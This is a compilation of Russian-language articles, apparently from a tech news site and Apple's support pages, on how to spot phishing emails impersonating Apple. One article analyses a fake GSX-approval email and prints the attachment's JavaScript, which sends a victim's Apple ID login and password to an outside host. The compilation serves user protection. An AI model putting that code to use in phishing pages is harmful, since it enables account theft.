Письма от apple support

Как легко определить фишинговое письмо или сайт «от Apple»

Самый действенный способ.

С начала 2018 года участились случаи массовых фишинговых атак на пользователей техники Apple. Дошло до того, что Apple официально предупредила пользователей о существующей опасности и даже опубликовала специальную статью, в которой рассказала как не попасться на уловки мошенников. Впрочем, защитить себя от фишинговых писем и сайтов достаточно просто. В этой инструкции рассказали как самым простым образом определять любые попытки проведения фишинговой атаки на вас.

Фишинговые атаки являются самыми популярными среди хакеров в последние несколько лет. Причина заключается в их действенности. Согласно статистике, по количеству жертв фишинг находится на уверенном первом месте среди всех типов хакерских атак. Именно поэтому пользователям устройств Apple важно знать о том, как себя защитить.

Как легко определить фишинговое письмо или сайт «от Apple»

В своей статье о противодействии фишинговым атакам, Apple отмечала, что компании никогда не запрашивает у пользователей по электронной почте полный номер кредитной карты, ее CCV-код, а также девичью фамилию матери и номер социального страхования. Однако изучать пришедшее письмо на наличие подобных запросов вовсе необязательно.

Достаточно посмотреть на адрес отправителя. Письма от Apple приходят только с почтовых адресов с доменом apple.com. Если письмо пришло с почтового ящика с любым другим доменом, то вы видите перед собой фишинговое письмо.

Так, официальные письма об оплате подписок от Apple приходят с адреса почтового no_reply@email.apple.com. Ответы от службы поддержки с адреса AppleSupport@email.apple.com и т.д. Во всех случаях домен почтовых адресов apple.com.

Важно! Письма, полученные с почтовых адресов с доменом iCloud.com, могут быть фишинговыми, так как почту в этом домене может зарегистрировать любой желающий.

Таким образом, для того, чтобы не попасться на фишинговые письма достаточно при получении любого письма якобы от Apple проверить с какого почтового ящика пришло сообщение. Это займет всего пару секунд, но может спасти вас от крайне серьезных неприятностей.

Ранее мы рассказывали про общие рекомендации, которые позволяют определить фишинговый сайт или письмо.

Источник

Распознавайте фишинговые сообщения, ложные звонки из службы поддержки и другие виды мошенничества и не поддавайтесь на них

Эти советы помогут вам избежать мошенничества и узнать, что делать в случае получения подозрительных электронных писем, телефонных звонков или других сообщений.

Если вы получили подозрительное электронное письмо якобы от имени компании Apple, перешлите его по адресу reportphishing@apple.com. 1 .

Фишингом называются мошеннические попытки получить от вас личную информацию, как правило, по электронной почте. Однако мошенники используют любые способы, чтобы обманом заставить вас предоставить информацию или перевести им деньги, в том числе:

• мошеннические электронные письма и другие сообщения, которые выглядят так, как будто они отправляются надежными компаниями, включая Apple;
• вводящие в заблуждение всплывающие окна и реклама, сообщающие о проблеме с безопасностью;
• мошеннические телефонные звонки или сообщения автоответчика, выдающие себя за службу поддержки Apple;
• поддельные рекламные акции с бесплатными товарами и призами;
• нежелательные приглашения и подписки в календаре.

Если у вас возникли подозрения в отношении неожиданного сообщения, звонка или запроса личной информации или денежных средств, безопаснее предположить, что это мошенничество, и при необходимости связаться с этой компанией.Если вас беспокоит проблема с безопасностью устройства Apple, вы можете получить помощь от Apple.

Если вы считаете, что ваш идентификатор Apple ID был взломан, или если вы могли ввести свой пароль или другую личную информацию на мошенническом веб-сайте, немедленно измените свой пароль идентификатора Apple ID.

Как защитить учетную запись и устройства Apple

Вот несколько советов, как избежать мошеннических атак, направленных на вашу учетную запись и устройства Apple.

• Ни при каких обстоятельствах не передавайте личную информацию, такую как номера кредитных карт, если не можете убедиться, что получатель является тем, за кого себя выдает.
• Защита идентификатора Apple ID. Используйте двухфакторную аутентификацию, всегда храните свою контактную информацию в надежном месте и регулярно обновляйте ее; никогда никому не сообщайте свой пароль идентификатора Apple ID или коды подтверждения. Служба поддержки Apple никогда не запрашивает эту информацию.
• Никогда не используйте подарочные карты Apple для осуществления других типов платежей.
• Узнайте, как определить подлинность электронных писем от компании Apple о ваших покупках в App Store или iTunes Store. Если вы отправляете или получаете деньги с помощью Apple Pay (только для США), относитесь к этому как к любой другой конфиденциальной транзакции.
• Узнайте, как обеспечить безопасность устройств Apple и ваших данных.
• Загружайте программное обеспечение только из источников, которым можно доверять.
• Не переходите по ссылкам, не открывайте и не сохраняйте вложения в подозрительных или нежелательных сообщениях.

Источник

Определение подлинности сообщений электронной почты от магазинов App Store и iTunes Store

Если вы не уверены в подлинности сообщения электронной почты с информацией о покупке в App Store, iTunes Store, iBooks Store или Apple Music, вам могут пригодиться эти советы.

Мошенники часто пытаются обманом выманить личную или финансовую информацию, отправляя сообщения или ссылки на веб-сайты, которые с виду похожи на материалы компании Apple, но на самом деле предназначены для кражи ваших учетных данных. В некоторых подобных сообщениях предлагается перейти по ссылке для обновления информации учетной записи. Другие сообщения похожи на квитанцию от магазина App Store, iTunes Store или iBooks Store либо от службы Apple Music, при том что вы не совершали этой покупки.

Никогда не вводите данные своей учетной записи на веб-сайтах, на которые ведут такие сообщения, и никогда не загружайте и не открывайте вложения к ним.

Как проверить подлинность сообщения?

Получив по электронной почте сообщение с информацией о покупке в App Store или iTunes Store, в подлинности которого вы не уверены, обратите внимание на отдельные моменты, которые помогут вам понять, что сообщение действительно поступило от Apple.

Оригинальные квитанции на покупку, совершенную в App Store, iTunes Store, iBooks Store или Apple Music, содержат актуальный адрес выставления счетов, который вряд ли будет известен мошенникам. Кроме того, вы можете изучить свою историю покупок в App Store, iTunes Store, iBooks Store или Apple Music.

В сообщениях о покупках App Store, iTunes Store, iBooks Store или Apple Music мы никогда не будем просить вас передать следующую информацию по электронной почте:

• номер социального страхования;
• девичью фамилию матери;
• полный номер кредитной карты;
• CCV-код кредитной карты.

Подробнее о фишинге и других способах мошенничества можно узнать в этой статье.

Безопасный способ обновления информации учетной записи

Получив по электронной почте сообщение с просьбой изменить платежную информацию или данные учетной записи, следует делать это только через меню «Настройки» прямо на устройстве iPhone, iPad, iPod touch? либо в программе iTunes или App Store на компьютере Mac, либо в iTunes для Windows.

Изменять пароль к идентификатору Apple ID, который используется для покупок, следует только в меню «Настройки» на устройстве или на веб-сайте appleid.apple.com.

Дополнительные сведения о мерах безопасности и идентификаторе Apple ID см. в этой статье.

Действия в случае получения подозрительного сообщения или реакции на него

В случае получения сообщения, предположительно являющегося фишинговым, следует переслать его на адрес reportphishing@apple.com. На компьютере Mac выберите такое сообщение и нажмите пункт «Переслать как вложенный файл» в меню сообщения.

Если вы подозреваете, что только что ввели персональную информацию, например пароль или номер кредитной карты, на мошенническом веб-сайте, незамедлительно смените пароль идентификатора Apple ID.

Источник

Внимание! Сегодня нам на почту пришло странное письмо… от Apple

На ваш почтовый ящик часто приходит спам? Он бывает разный: рекламный, с просьбой о помощи каким-то неведомым африканским товарищам, попавшим в сложную финансовую ситуацию, рассылка из сервисов… Сегодня на почтовый адрес нашей редакции пришло любопытное письмо… от Apple.

Вернее, так можно было подумать на первый взгляд, но при детальном рассмотрении содержимого письма стало сразу же понятно, что это фейковый почтовый адрес, цель которого — получение пароля и логина от Apple ID.

Само письмо выглядит следующим образом:

Из короткого сообщения мы узнали, что наша заявка в качестве участника программы Global Service Exchange (GSX) одобрена. Все, что нужно для активации — загрузить прилагающийся архив и ввести данные Apple ID в прилагающейся форме.

Самое интересно в том, что никакой заявки на участие в GSX ни один из членов нашей редакции не подавал.

GSX — это специализированный инструмент, который Apple выдает ограниченному кругу специалистов с целью осуществления сервисного обслуживания в рамках программы AppleCare. В работе используется iOS Diagnostics Apple, либо магазин-посредник, который позволяет связать с устройством клиента для получения необходимой информации.

Полученное письмо действительно выглядит правдоподобно: кратко, по делу, с подтверждением заявки и главной — адрес отправителя. Весьма реалистичный адрес [email protected] — в том же домене, что и Apple и без дополнительных приписок.

Внутри архива есть единственный файл в формате *.shtml. Открываем — обычная форма, которая полностью совпадает с оригиналом от Apple:

Разумеется, вводить Apple ID в подозрительное окно мы не стали.

В прикрепленном файле был обнаружен следующий код:

[jscript]
xmlhttp_rkchk.open(‘POST’,’http://nubetelstore.com/admin3667/123/checkapp2.php’,true);
xmlhttp_rkchk.setRequestHeader(‘Content-Type’,’application/x-www-form-urlencoded;charset=utf8′);
xmlhttp_rkchk.send(‘e=’+accountname+’&p=’+accountpassword);
[/jscript]

Он передает логин и пароль на сайт nubetelstore.com

В whois без палева указан email и телефон хостера. А фишинговый сайт до сих по не заблокирован. Мы сообщим им об этой проблеме.

Хозяева сайта скорее всего не знают о том, что он используется для воровства аккаунтов. Это новый PHP-сайт, беглый осмотр html-кода которого показал, что он возможно был написан людьми, которые не думали о безопасности и делали по принципу: «Чтобы работало». С большой вероятностью nublestore.com был взломан и используется мошенниками без ведома его владельцев.

Как выяснилось, полученное нами письмо — распространенный вариант фишинга, который от имени [email protected] действует с февраля месяца. Достаточно ввести данные своего аккаунта, как вы тут же попадаетесь на крючок злоумышленника и полностью теряете контроль на своим аккаунтом.

Будьте внимательны и никогда не вводите данные своей учетной записи в подозрительные формы. Фишинг — штука тонкая и адрес [email protected] выглядел весьма правдоподобно. Если бы кто-то из нашей большой команды сайта действительно подавал заявку на участие в Global Service Exchange, подвоха мы сразу могли бы и не заметить.

Источник

Мошенники хотят украсть ваш Apple ID. Будьте осторожны

Время от времени мошенники активизируются и начинают атаковать, как правило, владельцев устройств от Apple. Они обманным путем получают доступ к Apple ID и паролям ни о чем не подозревающих пользователей. Правда, последние по своей невнимательности сами «дарят» свои данные злоумышленникам: например, при помощи писем о несуществующей покупке в iTunes Store хакеры собирают номера банковских карт пользователей и другую конфиденциальную информацию. Сегодня расскажем, как выявить такие письма и не стать очередной жертвой.

С виду послание выглядит как письмо от технической поддержки Apple, даже логотип корпорации пририсовать успели. Тема может быть разная: в нашем случае якобы заблокировали Apple ID из-за входа с помощью нового браузера. Также иногда приходят письма, что из-за недавнего изменения в аккаунте пользователя, некоторые данные могут быть неверными: во всех случаях прикладывается ссылка на специальную форму для обновления информации. Большинство атак приходится на адреса электронной почты в зоне «.ru», а значит жертвами могут стать преимущественно российские пользователи.

С первого взгляда можно подумать, что письмо действительно пришло от Apple — об этом свидетельствует подпись «Apple Support», логотипы компании и ссылка, по которой предлагается перейти (https://iforgot.apple.com).

Если пользователь не разбирается в этом и ни разу не сталкивался с фишингом, он вполне может пройти по ссылке, заполнить все поля (ведь сайты злоумышленников стилизованы под Apple) и…остаться без своей учетной записи Apple ID. Отличить злоумышленников от техподдержки Apple очень просто, необходимо лишь быть чуть внимательнее.

Если вы получили подобное письмо, в первую очередь проверьте адрес отправителя. В нашем случае это совершенно непонятная электронная почта, по адресу явно не связанная с Apple. Более находчивые злоумышленники часто маскируются под почту поддержки Apple — адрес в этом случае отличается парой букв.

Также внимательно изучите письмо на предмет опечаток. Например, в нашем письме мошенники просто «промахнулись» мимо клавиши с пробелом и ввели лишний символ в подписи.

Что будет, если перейти по ссылке?

Спустя несколько редиректов вы попадете на непонятный сайт (возможно, у него будет SSL-сертификат и адрес id.apple.com для правдоподобности). Мошенники рассчитывают на то, что раз страница выглядит так же, как официальная страница входа Apple ID, пользователь введет свой Apple ID и пароль, после чего данные в открытом виде попадут в руки злоумышленников. Последним же хватит нескольких минут, чтобы скопировать информацию, украсть данные или заблокировать все ваши устройства с целью получения выкупа.

Как защитить себя

Быть внимательнее. Правда, если потратить хотя бы 30 секунд на изучение письма, можно сразу выявить мошенников. Не стоит забывать и о двухфакторной аутентификации — отличном способе защиты.

Так что будьте внимательны, следуйте простым инструкциям и на всякий случай предупредите друзей и родственников, которые могут быть не столь подготовленными в данном вопросе. А при получении таких писем пересылайте их на reportphishing@apple.com.

Предлагаем подписаться на наш канал в «Яндекс.Дзен». Там вы сможете найти эксклюзивные материалы, которых нет на сайте.

Источник